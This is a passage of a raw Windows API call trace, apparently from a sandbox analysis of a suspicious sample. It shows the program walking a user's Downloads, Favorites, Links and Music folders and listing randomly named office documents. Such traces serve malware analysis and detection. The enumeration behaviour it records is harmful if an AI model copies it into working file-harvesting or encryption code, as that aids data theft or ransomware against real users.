lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0184.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0184.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb46c0 | out: hHeap=0x620000) returned 1 [0184.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0184.947] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06c2ab0, ftCreationTime.dwHighDateTime=0x1d89cf7, ftLastAccessTime.dwLowDateTime=0x9560f010, ftLastAccessTime.dwHighDateTime=0x1d8a26e, ftLastWriteTime.dwLowDateTime=0x9560f010, ftLastWriteTime.dwHighDateTime=0x1d8a26e, nFileSizeHigh=0x0, nFileSizeLow=0xbb23, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pY_fFtiab_Q4NWHp.docx", cAlternateFileName="PY_FFT~1.DOC")) returned 1 [0184.948] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78f72e20, ftCreationTime.dwHighDateTime=0x1d83f23, ftLastAccessTime.dwLowDateTime=0x9b898f80, ftLastAccessTime.dwHighDateTime=0x1d84afb, ftLastWriteTime.dwLowDateTime=0x9b898f80, ftLastWriteTime.dwHighDateTime=0x1d84afb, nFileSizeHigh=0x0, nFileSizeLow=0x17b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QtNn2GZ.xlsx", cAlternateFileName="QTNN2G~1.XLS")) returned 1 [0184.948] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8efb350, ftCreationTime.dwHighDateTime=0x1d82477, ftLastAccessTime.dwLowDateTime=0x55be2120, ftLastAccessTime.dwHighDateTime=0x1d84973, ftLastWriteTime.dwLowDateTime=0x55be2120, ftLastWriteTime.dwHighDateTime=0x1d84973, nFileSizeHigh=0x0, nFileSizeLow=0x9221, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tPG-9VHK-ulBZl_Q.docx", cAlternateFileName="TPG-9V~1.DOC")) returned 1 [0184.948] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92e06520, ftCreationTime.dwHighDateTime=0x1d89cdb, ftLastAccessTime.dwLowDateTime=0x529888d0, ftLastAccessTime.dwHighDateTime=0x1d8a465, ftLastWriteTime.dwLowDateTime=0x529888d0, ftLastWriteTime.dwHighDateTime=0x1d8a465, nFileSizeHigh=0x0, nFileSizeLow=0x4be6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T_CIyr3B-hwvI5YqWU4.ods", cAlternateFileName="T_CIYR~1.ODS")) returned 1 [0184.948] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9fd7ba0, ftCreationTime.dwHighDateTime=0x1d896fb, ftLastAccessTime.dwLowDateTime=0x8255f1d0, ftLastAccessTime.dwHighDateTime=0x1d8a4eb, ftLastWriteTime.dwLowDateTime=0x8255f1d0, ftLastWriteTime.dwHighDateTime=0x1d8a4eb, nFileSizeHigh=0x0, nFileSizeLow=0x147dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wnP_mIiKwB9aJXHHeZ.ots", cAlternateFileName="WNP_MI~1.OTS")) returned 1 [0184.948] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50102050, ftCreationTime.dwHighDateTime=0x1d89cfe, ftLastAccessTime.dwLowDateTime=0xa2688630, ftLastAccessTime.dwHighDateTime=0x1d8a159, ftLastWriteTime.dwLowDateTime=0xa2688630, ftLastWriteTime.dwHighDateTime=0x1d8a159, nFileSizeHigh=0x0, nFileSizeLow=0x54eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z1NiZTMoyaVazPqQ.rtf", cAlternateFileName="Z1NIZT~1.RTF")) returned 1 [0184.948] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e8cce40, ftCreationTime.dwHighDateTime=0x1d8a385, ftLastAccessTime.dwLowDateTime=0x900a740, ftLastAccessTime.dwHighDateTime=0x1d8a3dc, ftLastWriteTime.dwLowDateTime=0x900a740, ftLastWriteTime.dwHighDateTime=0x1d8a3dc, nFileSizeHigh=0x0, nFileSizeLow=0x6a20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zlIY3__yM6-.csv", cAlternateFileName="ZLIY3_~1.CSV")) returned 1 [0184.948] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40772ed0, ftCreationTime.dwHighDateTime=0x1d86c6c, ftLastAccessTime.dwLowDateTime=0x7ba045a0, ftLastAccessTime.dwHighDateTime=0x1d89408, ftLastWriteTime.dwLowDateTime=0x7ba045a0, ftLastWriteTime.dwHighDateTime=0x1d89408, nFileSizeHigh=0x0, nFileSizeLow=0x17e70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_3Wl5D4o0g2MKtP.pptx", cAlternateFileName="_3WL5D~1.PPT")) returned 1 [0184.948] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38d15e90, ftCreationTime.dwHighDateTime=0x1d83a11, ftLastAccessTime.dwLowDateTime=0xa7c7e6b0, ftLastAccessTime.dwHighDateTime=0x1d85993, ftLastWriteTime.dwLowDateTime=0xa7c7e6b0, ftLastWriteTime.dwHighDateTime=0x1d85993, nFileSizeHigh=0x0, nFileSizeLow=0x18422, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dmv92XP.pptx", cAlternateFileName="_DMV92~1.PPT")) returned 1 [0184.948] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38d15e90, ftCreationTime.dwHighDateTime=0x1d83a11, ftLastAccessTime.dwLowDateTime=0xa7c7e6b0, ftLastAccessTime.dwHighDateTime=0x1d85993, ftLastWriteTime.dwLowDateTime=0xa7c7e6b0, ftLastWriteTime.dwHighDateTime=0x1d85993, nFileSizeHigh=0x0, nFileSizeLow=0x18422, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dmv92XP.pptx", cAlternateFileName="_DMV92~1.PPT")) returned 0 [0184.948] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0184.949] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.951] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Downloads\\") returned="Downloads\\" [0184.951] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.951] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.951] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.951] PathFindFileNameW (pszPath="") returned="" [0184.951] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Downloads\\*" (normalized: "c:\\users\\keecfmwgj\\downloads\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.952] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.952] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8365c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.952] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8365c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0184.952] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.953] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.953] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0184.953] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.953] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.953] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.953] PathFindFileNameW (pszPath="") returned="" [0184.953] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.953] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.953] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fe350, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.953] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d32fba0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0184.954] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0184.954] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0184.954] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0184.954] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0184.954] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.954] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.954] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Links\\") returned="Links\\" [0184.954] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.954] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.954] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.954] PathFindFileNameW (pszPath="") returned="" [0184.954] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\*" (normalized: "c:\\users\\keecfmwgj\\links\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.955] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.955] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.955] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1c7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0184.955] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x36e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0184.955] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ab6db0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x5fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0184.955] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0184.955] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0184.955] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0184.955] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.955] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Local Settings\\") returned="Local Settings\\" [0184.955] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.955] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.955] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.955] PathFindFileNameW (pszPath="") returned="" [0184.955] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Local Settings\\*" (normalized: "c:\\users\\keecfmwgj\\local settings\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0184.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0184.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaef8 | out: hHeap=0x620000) returned 1 [0184.957] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.957] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0184.957] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.957] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.957] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.957] PathFindFileNameW (pszPath="") returned="" [0184.958] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\*" (normalized: "c:\\users\\keecfmwgj\\music\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98121430, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98121430, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.958] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98121430, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98121430, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.958] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5a88c40, ftCreationTime.dwHighDateTime=0x1d89c6d, ftLastAccessTime.dwLowDateTime=0x6b678d10, ftLastAccessTime.dwHighDateTime=0x1d8a100, ftLastWriteTime.dwLowDateTime=0x6b678d10, ftLastWriteTime.dwHighDateTime=0x1d8a100, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, 